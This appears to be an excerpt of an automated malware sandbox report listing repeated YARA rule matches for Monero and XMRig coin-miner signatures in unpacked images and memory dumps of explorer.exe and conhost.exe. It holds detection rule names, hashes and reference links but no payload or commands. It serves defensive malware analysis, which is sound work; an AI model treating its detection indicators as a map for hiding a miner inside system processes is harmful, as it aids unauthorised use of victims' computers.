Source: 18.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 17.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 17.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 17.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 18.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 9.2.conhost.exe.2c960a01248.6.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 9.2.conhost.exe.2c960a01248.6.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 18.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 18.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 17.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 17.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 18.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 17.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 18.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 17.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000011.00000000.712169070.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000011.00000000.712169070.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000012.00000000.713121937.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000012.00000000.713121937.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000012.00000000.715770261.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000012.00000000.715770261.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000012.00000000.769937970.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000012.00000000.769937970.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000011.00000000.724751295.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000011.00000000.724751295.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000012.00000000.724515509.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000012.00000000.724515509.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000012.00000000.704591182.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000012.00000000.704591182.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000011.00000000.717951007.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000011.00000000.717951007.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000000F.00000003.719582086.000002A79BBD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000011.00000000.704736312.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000011.00000000.704736312.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000011.00000000.713985115.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000011.00000000.713985115.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000011.00000000.708825337.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000011.00000000.708825337.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000011.00000000.716519488.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000011.00000000.716519488.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000011.00000000.706517358.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000011.00000000.706517358.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000011.00000000.721988497.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000011.00000000.721988497.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000012.00000000.797286728.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000012.00000000.797286728.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
